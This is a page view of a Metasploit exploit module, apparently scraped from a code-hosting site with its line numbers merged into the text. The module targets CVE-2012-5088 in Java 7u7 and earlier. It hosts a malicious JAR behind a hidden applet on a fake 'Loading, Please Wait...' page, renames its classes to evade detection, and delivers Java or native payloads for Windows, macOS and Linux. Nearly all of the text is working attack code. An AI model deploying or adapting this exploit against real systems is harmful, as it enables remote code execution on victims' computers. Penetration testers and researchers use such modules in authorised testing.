Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/browser/java_jre17_method_handle.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011#include Msf::Exploit::Remote::BrowserAutopwn12#autopwn_info({ :javascript => false })1314def initialize( info = {} )1516super( update_info( info,17'Name' => 'Java Applet Method Handle Remote Code Execution',18'Description' => %q{19This module abuses the Method Handle class from a Java Applet to run arbitrary20Java code outside of the sandbox. The vulnerability affects Java version 7u7 and21earlier.22},23'License' => MSF_LICENSE,24'Author' =>25[26'Unknown', # Vulnerability discovery at security-explorations.com27'juan vazquez' # Metasploit module28],29'References' =>30[31[ 'CVE', '2012-5088' ],32[ 'OSVDB', '86352' ],33[ 'BID', '56057' ],34[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],35[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]36],37'Platform' => %w{ java linux osx win },38'Payload' => { 'Space' => 20480, 'DisableNops' => true },39'Targets' =>40[41[ 'Generic (Java Payload)',42{43'Platform' => ['java'],44'Arch' => ARCH_JAVA,45}46],47[ 'Windows x86 (Native Payload)',48{49'Platform' => 'win',50'Arch' => ARCH_X86,51}52],53[ 'Mac OS X x86 (Native Payload)',54{55'Platform' => 'osx',56'Arch' => ARCH_X86,57}58],59[ 'Linux x86 (Native Payload)',60{61'Platform' => 'linux',62'Arch' => ARCH_X86,63}64],65],66'DefaultTarget' => 0,67'DisclosureDate' => '2012-10-16'68))69end707172def setup73path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5088", "Exploit.class")74@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }75path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5088", "B.class")76@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }7778@exploit_class_name = rand_text_alpha("Exploit".length)79@exploit_class.gsub!("Exploit", @exploit_class_name)80super81end8283def on_request_uri(cli, request)84print_status("handling request for #{request.uri}")8586case request.uri87when /\.jar$/i88jar = payload.encoded_jar89jar.add_file("#{@exploit_class_name}.class", @exploit_class)90jar.add_file("B.class", @loader_class)91metasploit_str = rand_text_alpha("metasploit".length)92payload_str = rand_text_alpha("payload".length)93jar.entries.each { |entry|94entry.name.gsub!("metasploit", metasploit_str)95entry.name.gsub!("Payload", payload_str)96entry.data = entry.data.gsub("metasploit", metasploit_str)97entry.data = entry.data.gsub("Payload", payload_str)98}99jar.build_manifest100101send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })102when /\/$/103payload = regenerate_payload(cli)104if not payload105print_error("Failed to generate the payload.")106send_not_found(cli)107return108end109send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })110else111send_redirect(cli, get_resource() + '/', '')112end113114end115116def generate_html117html = %Q|<html><head><title>Loading, Please Wait...</title></head>|118html += %Q|<body><center><p>Loading, Please Wait...</p></center>|119html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|120html += %Q|</applet></body></html>|121return html122end123end124125126